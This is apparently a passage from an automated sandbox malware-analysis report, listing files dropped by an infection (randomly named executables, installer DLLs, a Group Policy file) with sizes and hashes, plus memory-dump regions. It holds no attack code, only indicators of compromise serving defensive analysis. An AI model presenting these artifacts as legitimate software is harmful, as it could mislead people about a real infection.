8b1023a5314ad55d221e10fe13c3d2ec93506a6c

SHA256
609ef2b560381e8385a71a4a961afc94a1e1d19352414a591cd05217e9314625

SHA512
46e5e2e57cb46a96c5645555809713ff9e1a560d2ad7731117ef487d389319f97a339c3427385a313883a45c2b8d17ce9eec5ca2094efa3d432dd03d0ca3bb28

Download Submit
C:\Users\Admin\Documents\SimpleAdobe\LaoKGUkwiA_LYos8DHOmE7o8.exe

Filesize
10.9MB

MD5
d43ac79abe604caffefe6313617079a3

SHA1
b3587d3fa524761b207f812e11dd807062892335

SHA256
8b750884259dd004300a84505be782d05fca2e487a66484765a4a1e357b7c399

SHA512
bb22c73ed01ff97b73feb68ae2611b70ef002d1829035f58a4ba84c5a217db368aae8bdc02cdec59c1121922a207c662aa5f0a93377537da42657dd787587082

Download Submit
C:\Users\Admin\Documents\SimpleAdobe\QU0qqqFnqRS43r3Bn4tJZddj.exe

Filesize
2.4MB

MD5
f7c7b32828395558aa7c2b9181a37827

SHA1
20e32ca2523dd4424234410de41269224074e92c

SHA256
b3089e5dcd8bb243e734b2bee07996bd3357f4f7840d40555e431e18618e25b9

SHA512
e099159537d4ffb8fc0651cca235eded39a96709fd070a31e299b267fba3a7be44868ba2c3310a2fbb95d71da1cd2e892cbc250996c6f9749e467673b585b9f0

Download Submit
C:\Users\Admin\Documents\SimpleAdobe\g5j793kwWdb5AI7JI1ot1gu7.exe

Filesize
3.7MB

MD5
2f84ed6a99b05670c6194e34c15af5e9

SHA1
f16432077d2380c6af8ad657cbae238b0c593b9d

SHA256
a7ab2c787edf99461181701edf67560d86c81c9740253c18e33b7bb1cc882209

SHA512
9c78bd1ee10c8e45ed052e87316f74f5a73f805c9eff0fde300f9662d02d521e3167dc236672484d7f0a1fbd0a4d695f9b8a6d694a9e61d7901964926b88ad1e

Download Submit
C:\Users\Admin\Documents\SimpleAdobe\ibunqAkvSg_RiIgaoJbMaFK1.exe

Filesize
318KB

MD5
524cb6e788d19b529a9c074eaedbd6c6

SHA1
7ff62a9eb6450a1496a9900ecbcdd0ff9c785d88

SHA256
75c0ba5b88fb9d0a506071ad79ab8c85d7d0c107851b7839c08c70bfb0323a62

SHA512
668f8ef82f808401c2210380e459bc13f20d58b45d1c0ba35a302fcca05648690b7ed33db4ada309f8f79057c56b9c7b70195abb2d753e7c2c09caf0e5d513ee

Download Submit
C:\Users\Admin\Documents\SimpleAdobe\rthmAwolFoFkUNDXFJYnc0P_.exe

Filesize
343KB

MD5
a781dc9d7dbfd7f1b77829c2dc6c90c1

SHA1
de425afce6101e39765ec5724e5e6bf3775edab1

SHA256
7f12d8fb204675c549c0a6ba2a4f40f9c12a2189f48811d7045e497a1838cd6d

SHA512
c5fbecc6d900dfc9572d77b1536731c20025aa845921ccb9ab886b8d791fcd679210d596ef2debdf61f1e4784c0f9fed91aedb306cbf90341500c1191c166bf5

Download Submit
C:\Users\Admin\Documents\SimpleAdobe\th1wZ94DG16eg9QuRfgY0KGb.exe

Filesize
3.6MB

MD5
3fcae847546386892c6a0d04363a7e4c

SHA1
8bbfd2960be40aead5af444a560a0ae8b2847259

SHA256
d30f2e8e26f7ff70cb07b21b1b8496a1fdb16403e11de0e7ba842e36bca5c26b

SHA512
49cae3222f46b9ebfa1c465f7bbb6b13b8b8ca22eba78f918a92bc2fdf5215cab33a10db7f2ba97d3532cff74994303c76ec3f00da880ea2819203e43fae3a45

Download Submit
C:\Users\Admin\Documents\SimpleAdobe\ydp1PUcwLByKlWLQKGIfI94J.exe

Filesize
7.0MB

MD5
29bb1afac5690664cdc3ce0c1adfe0c5

SHA1
54218e6f0cc4fa175b37fce706bfac908cc81cc6

SHA256
d86f8a73cbeee2b95423dbd50ce5a1501215ea588ea0f82d1be079e8de5e177e

SHA512
d01f610bbff08ff15a6b6135edaa52748eb7f9d4ec9e6229c124cc8566b0de86d9ccc632470b9bf39870c9c89734d16fd0203927411e12d6e2e43ebdba8fdc1a

Download Submit
C:\Users\Admin\Pictures\UxiJhIsJOXxDEdLQAJGja5uS.exe

Filesize
7.3MB

MD5
f74fcc245dd45e9616656097665698b9

SHA1
dd2ad813cd1da59bcb19d6b81dbd60215b9bb987

SHA256
d1654381b2f43e13d88f2decbabe9695d09467fc26762f72f5dab3f43b0bd96e

SHA512
bead6f116b6d0d683389f323240acfcf717ae98b9c5d86c77c5d57dcca084abed6ccb6a4cc31b09a43bb368450a0645643200b65ab4260321c3f2b3b2d98a509

Download Submit
C:\Users\Admin\Pictures\Xd5ffINUWAexJgt1ZKuSRDbx.exe

Filesize
1.5MB

MD5
cd4acedefa9ab5c7dccac667f91cef13

SHA1
bff5ce910f75aeae37583a63828a00ae5f02c4e7

SHA256
dd0e8944471f44180dd44807d817e0b8a1c931fc67d48278cdb7354d98567e7c

SHA512
06fae66da503eb1b9b4fbe63a5bb98c519a43999060029c35fe289e60b1cb126a6278c67ce90f02e05b893fcaea6d54f9deb65bc6da82561487a7754f50c93d1

Download Submit
C:\Windows\System32\GroupPolicy\gpt.ini

Filesize
127B

MD5
8ef9853d1881c5fe4d681bfb31282a01

SHA1
a05609065520e4b4e553784c566430ad9736f19f

SHA256
9228f13d82c3dc96b957769f6081e5bac53cffca4ffde0ba1e102d9968f184a2

SHA512
5ddee931a08cfea5bb9d1c36355d47155a24d617c2a11d08364ffc54e593064011dee4fea8ac5b67029cab515d3071f0ba0422bb76af492a3115272ba8feb005

Download Submit
\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe

Filesize
1.8MB

MD5
ac7237bfbd3e63efa1c29bf506a5833d

SHA1
1d0160a085b8aa1383cba4e6c0b789014cf3cfe6

SHA256
8fdd6e5a048925c75f0187041cee6833ceb3f4f1d0ef34405016aa81da461908

SHA512
a3826b72be1815fbd782d9f6b20f732339d1540f378dd95c26e34b14cd60d57e9e613361b8c20da9f9fcead0c2ce84998eeb48ee3b5addc22b9374401a4c42eb

Download Submit
\Users\Admin\AppData\Local\Temp\nso730F.tmp\UAC.dll

Filesize
14KB

MD5
adb29e6b186daa765dc750128649b63d

SHA1
160cbdc4cb0ac2c142d361df138c537aa7e708c9

SHA256
2f7f8fc05dc4fd0d5cda501b47e4433357e887bbfed7292c028d99c73b52dc08

SHA512
b28adcccf0c33660fecd6f95f28f11f793dc9988582187617b4c113fb4e6fdad4cf7694cd8c0300a477e63536456894d119741a940dda09b7df3ff0087a7eada

Download Submit
\Users\Admin\AppData\Local\Temp\nso730F.tmp\nsExec.dll

Filesize
6KB

MD5
132e6153717a7f9710dcea4536f364cd

SHA1
e39bc82c7602e6dd0797115c2bd12e872a5fb2ab

SHA256
d29afce2588d8dd7bb94c00ca91cac0e85b80ffa6b221f5ffcb83a2497228eb2

SHA512
9aeb0b3051ce07fb9f03dfee7cea4a5e423425e48cb538173bd2a167817f867a30bd4d27d07875f27ca00031745b24547030b7f146660b049fa717590f1c77e1

Download Submit
\Users\Admin\AppData\Local\Temp\onefile_996_133617873297458000\stub.exe

Filesize
17.9MB

MD5
972d9d2422f1a71bed840709024302f8

SHA1
e52170710e3c413ae3cfa45fcdecf19db4aa382c

SHA256
1c666df4eafab03ecde809ffbc40dd60b8ac2fe7bdca5632c5c4002254e6e564

SHA512
3d84252756dcb4820b7794e9a92811d32631b9f3e9bd1a558fd040736b1472c0d00efb6ff7a13ae3bcd327f3bfac2b6ad94a5a3dfbc8ba54511a366c4f4727a6

Download Submit
memory/340-1821-0x0000000010000000-0x00000000105CF000-memory.dmp

Filesize
5.8MB

Download
memory/684-1413-0x000000013FFB0000-0x0000000141251000-memory.dmp

Filesize
18.6MB

Download
memory/996-200-0x000000013F520000-0x000000013FFF5000-memory.dmp

Filesize
10.8MB

Download
memory/1012-1293-0x0000000000400000-0x0000000000408000-memory.dmp

Filesize
32KB

Download
memory/1012-1295-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

Filesize
4KB

Download
memory/1012-1287-0x0000000000400000-0x0000000000408000-memory.dmp

Filesize
32KB

Download
memory/1012-1289-0x0000000000400000-0x0000000000408000-memory.dmp

Filesize
32KB

Download
memory/1012-1291-0x0000000000400000-0x0000000000408000-memory.dmp

Filesize
32KB

Download
memory/1012-1299-0x0000000000400000-0x0000000000408000-memory.dmp

Filesize
32KB

Download
memory/1012-1296-0x0000000000400000-0x0000000000408000-memory.dmp

Filesize
32KB

Download
memory/1012-1297-0x0000000000400000-0x0000000000408000-memory.dmp

Filesize
32KB

Download
memory/1676-1387-0x000000001B170000-0x000000001B1D8000-memory.dmp

Filesize
416KB

Download
memory/1676-1316-0x0000000000DE0000-0x0000000000DEA000-memory.dmp

Filesize
40KB

Download
memory/2000-157-0x000000013F3D0000-0x0000000140605000-memory.dmp

Filesize
18.2MB

Download
memory/2176-1401-0x0000000000400000-0x0000000000416000-memory.dmp

Filesize
88KB

Download
memory/2176-1399-0x0000000000400000-0x0000000000416000-memory.dmp

Filesize
88KB

Download
memory/2176-1398-0x0000000000400000-0x0000000000416000-memory.dmp

Filesize
88KB

Download
memory/2176-1389-0x0000000000400000-0x0000000000416000-memory.dmp

Filesize
88KB

Download
memory/2176-1397-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

Filesize
4KB

Download
memory/2176-1395-0x0000000000400000-0x0000000000416000-memory.dmp

Filesize
88KB

Download
memory/2176-1393-0x0000000000400000-0x0000000000416000-memory.dmp

Filesize
88KB

Download
memory/2176-1391-0x0000000000400000-0x0000000000416000-memory.dmp

Filesize
88KB

Download
memory/2296-2455-0x000000001B4A0000-0x000000001B782000-memory.dmp

Filesize
2.9MB

Download
memory/2296-2456-0x0000000002810000-0x0000000002818000-memory.dmp

Filesize
32KB

Download
memory/2440-38-0x0000000000020000-0x0000000000021000-memory.dmp

Filesize
4KB

Download
memory/2440-39-0x0000000000020000-0x0000000000021000-memory.dmp

Filesize
4KB

Download
memory/2460-1104-0x0000000000E30000-0x0000000000E80000-memory.dmp

Filesize
320KB

Download
memory/2516-1412-0x0000000001EC0000-0x0000000001EC8000-memory.dmp

Filesize
32KB

Download
memory/2516-1411-0x000000001B600000-0x000000001B8E2000-memory.dmp

Filesize
2.9MB

Download
memory/2736-360-0x0000000000EA0000-0x0000000001350000-memory.dmp

Filesize
4.7MB

Download
memory/2736-20-0x0000000000EA0000-0x0000000001350000-memory.dmp

Filesize
4.7MB

Download
memory/2736-16-0x0000000000EA0000-0x0000000001350000-memory.dmp

Filesize
4.7MB

Download
memory/2736-359-0x0000000000EA0000-0x0000000001350000-memory.dmp

Filesize
4.7MB

Download
memory/2736-1748-0x0000000000EA0000-0x0000000001350000-memory.dmp

Filesize
4.7MB

Download
memory/2736-1388-0x0000000000EA0000-0x0000000001350000-memory.dmp

Filesize
4.7MB

Download
memory/2736-1529-0x0000000000EA0000-0x0000000001350000-memory.dmp

Filesize
4.7MB

Download
memory/2736-902-0x0000000000EA0000-0x0000000001350000-memory.dmp

Filesize
4.7MB

Download
memory/2736-21-0x0000000000EA0000-0x0000000001350000-memory.dmp

Filesize
4.7MB

Download
memory/2736-104-0x0000000000EA0000-0x0000000001350000-memory.dmp

Filesize
4.7MB

Download
memory/2736-899-0x0000000000EA0000-0x0000000001350000-memory.dmp

Filesize
4.7MB

Download
memory/2736-18-0x0000000000EA0000-0x0000000001350000-memory.dmp

Filesize
4.7MB

Download
memory/2736-17-0x0000000000EA1000-0x0000000000ECF000-memory.dmp

Filesize
184KB

Download
memory/2736-223-0x0000000000EA0000-0x0000000001350000-memory.dmp

Filesize
4.7MB

Download
memory/2736-466-0x0000000000EA0000-0x0000000001350000-memory.dmp

Filesize
4.7MB

Download
memory/2736-224-0x0000000000EA0000-0x0000000001350000-memory.dmp

Filesize
4.7MB

Download
memory/2736-103-0x0000000000EA0000-0x0000000001350000-memory.dmp

Filesize
4.7MB

Download
memory/2792-1285-0x000000001B720000-0x000000001BA02000-memory.dmp

Filesize
2.9MB

Download
memory/2792-1286-0x0000000001E70000-0x0000000001E78000-memory.dmp

Filesize
32KB

Download
memory/3024-1280-0x0000000001E60000-0x0000000001EBA000-memory.dmp

Filesize
360KB

Download
memory/3024-916-0x00000000003A0000-0x00000000003AA000-memory.dmp

Filesize
40KB

Download
memory/3068-15-0x0000000000D40000-0x00000000011F0000-memory.dmp

Filesize
4.7MB

Download
memory/3068-1-0x0000000077400000-0x0000000077402000-memory.dmp

Filesize
8KB

Download
memory/3068-2-0x0000000000D41000-0x0000000000D6F000-memory.dmp

Filesize
184KB

Download
memory/3068-3-0x0000000000D40000-0x00000000011F0000-memory.dmp

Filesize
4.7MB

Download
memory/3068-5-0x0000000000D40000-0x00000000011F0000-memory.dmp

Filesize
4.7MB

Download
memory/3068-0-0x0000000000D40000-0x00000000011F0000-memory.dmp

Filesize
4.7MB

Download
memory/3080-2082-0x00000000006D0000-0x00000000006E5000-memory.dmp

Filesize
84KB

Download
memory/3080-2074-0x00000000006D0000-0x00000000006E5000-memory.dmp

Filesize
84KB

Download
memory/3080-2068-0x0000000005110000-0x0000000005350000-memory.dmp

Filesize
2.2MB

Download
memory/3080-2073-0x00000000006D0000-0x00000000006E5000-memory.dmp

Filesize
84KB

Download
memory/3080-2076-0x00000000006D0000-0x00000000006E5000-memory.dmp

Filesize
84KB

Download
memory/3080-2078-0x00000000006D0000-0x00000000006E5000-memory.dmp

Filesize
84KB

Download
memory/3080-2080-0x00000000006D0000-0x00000000006E5000-memory.dmp

Filesize
84KB

Download
memory/3080-2067-0x00000000001E0000-0x0000000000598000-memory.dmp

Filesize
3.7MB

Download
memory/3080-2069-0x0000000006850000-0x0000000006A74000-memory.dmp

Filesize
2.1MB

Download
memory/3080-2084-0x00000000006D0000-0x00000000006E5000-memory.dmp

Filesize
84KB

Download
memory/3080-2086-0x00000000006D0000-0x00000000006E5000-memory.dmp

Filesize
84KB

Download
memory/3080-2088-0x00000000006D0000-0x00000000006E5000-memory.dmp

Filesize
84KB

Download
memory/3080-2070-0x00000000006D0000-0x00000000006EC000-memory.dmp

Filesize
112KB

Download